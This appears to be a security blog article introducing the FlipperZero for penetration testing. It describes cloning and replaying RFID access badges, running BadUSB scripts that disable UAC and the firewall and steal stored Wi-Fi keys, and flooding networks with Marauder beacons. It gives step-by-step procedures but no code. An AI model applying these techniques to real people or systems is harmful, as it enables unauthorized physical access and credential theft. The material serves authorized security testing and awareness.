Introduced initially as a Kickstarter campaign seeking to raise $60K towards the end of 2022, the FlipperZero has taken the security world by storm, producing dozens of YouTube videos, write-ups, GitHub repos, and derivative products to extend its capabilities.
Hailed as a ‘Swiss-army knife for geeks and pentesters,’ this handy little multi-tool might be what's missing in your approach to physical and wireless security testing. Capable of assessing and compromising a broad spectrum of radio and wireless signals, this tool, developed by Pavel Zhovner, excels in performing a wide variety of security tasks that have not been commercially possible in a platform of this size until now.
From a cybersecurity perspective, the FlipperZero excels at cloning and replaying access badges, capturing, replaying, or abusing wireless network signals, and leveraging semi-sophisticated scripts to attack enterprise devices like laptops or wireless access points. The infographic below summarizes the core technologies the FlipperZero is capable of interacting with or potentially abusing.
The FlipperZero firmware is open-source and highly extensible, allowing users to add or expand the core platform features, drastically increasing its effectiveness. Several evolutions of the FlipperZero firmware often referred to as ‘DarkFlippers,’ are available via various GitHub repositories, including the Unleashed, RogueMaster & X-treme firmware editions.
Flashing a new firmware on your FlipperZero may void the warranty or break the functionality and usability of the device. It is generally advised that these actions are avoided and if these actions do occur, that the device is backed up before attempting firmware upgrades or modification. This article will explore high-level examples of how a FlipperZero can aid in physical or wireless penetration testing exercises using the X-treme (aka ClaraCrazy) firmware edition, paired with a Wi-fi Developer Board running Marauder firmware.
The FlipperZero also provides numerous management options via a mobile application and the qFlipper Desktop application, which ease the platform's administration. While not required, the FlipperZero works best with an SD card inserted and configured to serve as storage for the FlipperZero database.
The FlipperZero can fit into penetration testing exercises in a variety of ways. While this device can assess or manipulate wireless network traffic from a distance, it excels at nearby interactions such as script execution via USB, credential theft, and brute-forcing a variety of other devices such as safes, badge access readers, or even garage door openers.
The infographic below suggests one of many approaches where the FlipperZero could obtain access to a client facility or evaluate other aspects of physical and wireless network security. The FlipperZero must typically be within a few inches of an access badge or other NFC-based authenticator for identification and cloning operations to succeed. The antennas on the FlipperZero device are easily defeated in current models by sleeved badges which protect from RFID scanning or those buried under a few layers of clothing or badges contained within a wallet or purse.
The article will shift to pointed examples demonstrating how to use a FlipperZero directly and effectively, starting with badge cloning, BadUSB script examples, and running the Wi-Fi-Marauder application for wireless assessments. Starting with access badge cloning, this technique is a straightforward affair when access badges are left unattended (you do get lucky often here), hanging loosely on a lanyard, or can be accessed directly through a single layer of an individual’s clothing. From the 125 kHz RFID menu, select “Read” then hold the Flipper antenna over the card as depicted in the image below.
Once cloned successfully, the “Emulate” feature then allows the replaying of cloned badges at any reader, granting the holder of the cloned badge the same access as the original. Replayed credentials cannot be easily distinguished from the original in security logs, allowing the masquerading of users on a large scale. The effectiveness of the FlipperZero badge cloning technique reduces significantly when adopting encrypted communications between readers and access badges, RFID sleeves for employee badges to prevent cloning attempts, and awareness training for employees on the proper use or storage of access badges.
BadUSB is one of the more thrilling features of the FlipperZero due to its versatility in performing a variety of traditional pentesting techniques through script execution. Numerous repositories on GitHub provide field-tested BadUSB scripts out of the box. Some of the more notable repositories include Hak5, FalsePhilosopher, UNC0V3R3D, and I-Am-Jakoby. BadUSB will not typically succeed in sophisticated security environments that enforce the broader set of User Access Control (UAC) policies via Microsoft Group Policy or strong endpoint protections like Windows Defender or Crowdstrike Falcon, where many organizations may remain surprisingly lax.
This article will assume a scenario where an unattended administrator PC is discovered and has several BadUSB scripts executed against it, which succeed in the disablement of key security features such as Windows Firewall or UAC notifications and theft of all known Wi-fi keys on the device. Other BadUSB scripts, such as downloading and running Mimikatz to dump the SAM database, execution of reverse shells using Netcat, and installing backdoors via registry keys or other administrator accounts are also available.
To access, download or modify BadUSB scripts, they are typically located in the BadUSB folder on the onboard SD card, as shown below. Penetration testers or malicious hackers often attempt to disable or circumvent endpoint controls to achieve lateral movement or perform privilege escalation. Several BadUSB scripts executed from a FlipperZero can help realize these goals. Starting with the “disable_uac” script, the FlipperZero can suppress notifications to the user when applications modify computer settings or install the software.
A BadUSB script is executed by attaching the FlipperZero to a target machine via USB, navigating to the BadUSB menu option, selecting the script of choice, and running it by clicking the center button. Before execution of the “disable_uac” script, UAC on the target machine starts at the top-most “Always Notify” option and then ends at “Never Notify” following script execution.
Next, the “disable_firewall” BadUSB script is executed, turning off the various protection features offered by the Windows firewall, which assists devices in blocking internet-borne attacks and malicious software installation attempts.
The following BadUSB script is a little more advanced in its execution. Where the “disable_uac” and “disable_firewall” scripts perform simplistic string and keyboard inputs to achieve their desired outcomes, the “Wifi-Stealer_ORG” script leverages a short series of PowerShell commands that grab all known SSID information and stored W-Fi access keys, separates the data into distinct files, and places them on the targeted machines desktop for extraction.
The files can be easily emailed off the target computer using additional ‘Send-MailMessage’ PowerShell cmdlets or be stored in a less obvious location by altering the file path of the existing script. An example output file from the script output is shown below, revealing valid Wi-fi access keys which could be abused at an attacker's leisure.
Another exciting and highly flexible capability of the FlipperZero is conducting Wi-Fi-focused assessments using a Developer Wi-Fi dev board. After flashing the Marauder firmware onto the Developer board, the FlipperZero becomes a highly capable Wi-Fi penetration testing platform. The Marauder firmware allows the FlipperZero to identify in-range wireless networks, examine connected clients, perform probing attacks, and de-authenticate wireless clients, providing much of the desired capabilities found in traditional Wi-Fi assessment tools like Aircrack-ng.
The below example will demonstrate the identification of wireless networks, how to select networks for assessment, and the result of performing a ”RickRoll” attack against a wireless client. The first step involves selecting the “Wi-Fi Marauder” GPIO application, scanning Wi-Fi access points, selecting a target network, and then flooding the target network with beacon frames adverting false networks named after the song lyrics from “Never Gonna Give You Up” by Rick Astley. These activities measure the potential for ‘Adversary- in-the-Middle’ risks to be realized, aka ‘Evil Twin’ attacks, and will hopefully trigger employees reporting suspicious network activity.
This article merely skimmed the tip of the iceberg regarding what a FlipperZero is capable of from a signal analysis and security assessment perspective. There are several competing products on the market offering similar features. Still, many are hyper-focused on a lesser selection of capabilities compared to the FlipperZero, are more costly, and lack general flexibility regarding firmware modifications or expanding the solution's capabilities. The article purposefully showcased minor examples of how a FlipperZero can augment the approach and toolsets used during security assessment, aiming to pique the reader's curiosity to try and adapt the significant applications in future testing efforts. The only way a device as small and stealthy as a FlipperZero could be improved was if a fully-fledged penetration testing system like Kali Linux or ParrotOS was also shipped onboard.
As it just so happens, it looks like Flipper Devices Inc is already hard at work to scratch that itch with the FlipperOne, which is currently under development.
Your email address will not be published. Required fields are markedmarked